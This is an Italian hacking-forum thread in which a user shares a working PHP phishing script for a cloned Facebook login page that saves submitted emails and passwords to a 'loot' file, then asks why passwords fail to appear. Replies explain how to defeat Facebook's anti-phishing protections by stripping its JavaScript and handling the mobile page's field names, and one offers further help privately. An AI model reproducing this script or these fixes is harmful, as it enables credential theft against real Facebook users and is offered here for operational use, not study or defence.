Domanda Fake Login Facebook

Stato
Discussione chiusa ad ulteriori risposte.
Ordina per data Ordina commenti per reazioni
D

defaultraw

Utente Iron
4 Aprile 2020
7
2
1
12
Salve a tutti,

Ho provato a fare un fake login di facebook ma funziona per meta', nel senso..
Ho copiato l'index di facebook cambiando al parametro 'action=' con il nome del file contenente lo script, vado sul mio sito, faccio il login, si genera il file che ho chiamato 'bottino.txt' con dentro varie informazioni tra cui email e password...
Il problema sta nel fatto che con il pc mio, scrivendo le credenziali, funziona alla perfezione. Con un'altro dispositivo tipo, il mio cellulare quando eseguo il login e poi vado a vedere il log di bottino.txt, non appare la password, ma solo l'email. Perche' ? Non capisco se il procedimento funziona perche' con un'altro dispositivo no ?

Lo script del file php e' il seguente <?php header ('Location:http://it- it.facebook.com/'); $handle = fopen("bottino.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
Grazie anticipate
 
Il codice che hai riportato sembra corretto. Mi viene da pensare che la pagina che hai copiato rilevi che sta girando su un dispositivo mobile e utilizzi un qualche parametro. Prova a dare un'occhiata al codice sorgente. Se non sei capace inviami uno zip in privato e provo io.
 
Scusa mi sono dimenticato di scrivere che non ho provato solamente con il cellulare, ma anche con un'altro pc, stesso errore.
 
A me è capitata la stessa cosa , dopo varie prove , sono giunto alla conclusione che funziona su tutti i dispositivi tranne che su iphone , perchè il suo browser , safari , ha una specie di protezione password che non permette di inviare la password al tuo server.
 
Giusto, pero' ho menzionato prima che ho provato anche con un'ulteriore pc, ma stesso problema. Ho provato anche con un android, ora, ma ugualmente stesso problema.
Questo e' il log
jazoest=2761
lsd=AVphEiyc
email=lamiamail
pass=lapass
timezone=-135
lgndim=eyJ3IjoxMzY2LCJoIjo3NjgsImF3IjoxMzY2LCJhaCI=
lgnrnd=041251_6
lgnjs=1586259063
ab_test_data=AAAAPvfA/ffvAAAAPAAPAfAAAAAPPAAAAAAAAAAALL/tRLAAAAMAAH
locale=en_US
next=https://www.facebook.com/
login_source=login_bluebar
guid=fa085944fc68d8
prefill_contact_point=
prefill_source=browser_onload
prefill_type=contact_point

jazoest=2761
lsd=AVphEiyc
email=dalcellulare
timezone=-135
lgndim=eyJ3Ijo0MTQsImgiOjg5NiwiYXciOjQxNCw
lgnrnd=041251
lgnjs=1586259108
ab_test_data=AAAAqAVq/A/qAAVAAAAAVAAAAAAAAAAAVAAAAAAAAAAAAAAAAAJAAB
locale=en_US
next=https://www.facebook.com/
login_source=login_bluebar
guid=f10c79c2706fd22
prefill_contact_point=
prefill_source=
prefill_type=
ep=#PWD_BROWSER:5:1586259122:AbVQAPVvhMRzxgR5AWzSr2fTiamG/RN04QFsG8hVugghvqsAA8mVjmTTVe+VVnTizZTqqUrGpm0wZALBQ0mcjqjOMCIMrYMRNhe9H2bmWLpNvpM63T61zJ92KFHSL/kLbrTaxeR+mwY=
 
Ho risolto io con lui, mi sono dimenticato tuttavia di allegare l'archivio che gli avevo mandato in privato.
Semplicemente basta ripulire la pagina dagli script js di facebook.
 
  • Mi piace
Reazioni: Fenggar
[QUOTE = "MafiaBoy, post: 5083708, member: 263979"]
write to me privately if you need a hand
[/ QUOTE]
please help me out with this.i am also stuck here.not getting password information.
 
defaultraw ha detto:
Salve a tutti,

Ho provato a fare un fake login di facebook ma funziona per meta', nel senso..
Ho copiato l'index di facebook cambiando al parametro 'action=' con il nome del file contenente lo script, vado sul mio sito, faccio il login, si genera il file che ho chiamato 'bottino.txt' con dentro varie informazioni tra cui email e password...
Il problema sta nel fatto che con il pc mio, scrivendo le credenziali, funziona alla perfezione. Con un'altro dispositivo tipo, il mio cellulare quando eseguo il login e poi vado a vedere il log di bottino.txt, non appare la password, ma solo l'email. Perche' ? Non capisco se il procedimento funziona perche' con un'altro dispositivo no ?

Lo script del file php e' il seguente <?php header ('Location:http://it- it.facebook.com/'); $handle = fopen("bottino.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
Grazie anticipate
Clicca per espandere...
Io ho creato molti fake login ma non ho mai riscontrato questo problema
Messaggio unito automaticamente:

In genere esiste "mobile.html" per facebook (almeno fino ad un anno fa lol) nel caso il sito viene aperto da dispositivo mobile, può essere che l'input per l'email abbia lo stesso name, diverso invece per la passwd
 
Ho provato spoofando l'useragent da pc e i dati li invia tramite ajax in background, rimuovi gli script JS in fondo alla pagina prima del </body> perche' intercettano l'evento submit del form.
Probabilmente vede che viene da una source non valida, svuota il campo della password e ritorna true passando il controllo al submit dell'html.
 
Devi ripulire la pagina di facebook dagli js perché facebook ha introdotto delle protezioni per impedire il phishing. Si tratta della pagina mobile, vero?
 
Stato
Discussione chiusa ad ulteriori risposte.

DISCUSSIONI SIMILI

0
Guida Android Application Penetration Testing - Reversing & Static Analysis
  • 3
  • 2K
3
2K
Pentesting e Ethical Hacking Guide e Tools
0xbro
L
Domanda Programma di gestione autostrada in C
  • 1
  • 363
1
363
C / C++
DispatchCode
D
Guida Il Linguaggio Macchina di x86 e x86-64 (Parte 2)
  • In evidenza
  • 2
  • 980
2
980
Manuali di Informatica e Reti
DispatchCode
0
Guida Cosa è un Penetration Test e quali sono le sue fasi
  • Release
  • In evidenza
  • 2
  • 3K
2
3K
Pentesting e Ethical Hacking Guide e Tools
MRPants
Top Bottom
Indietro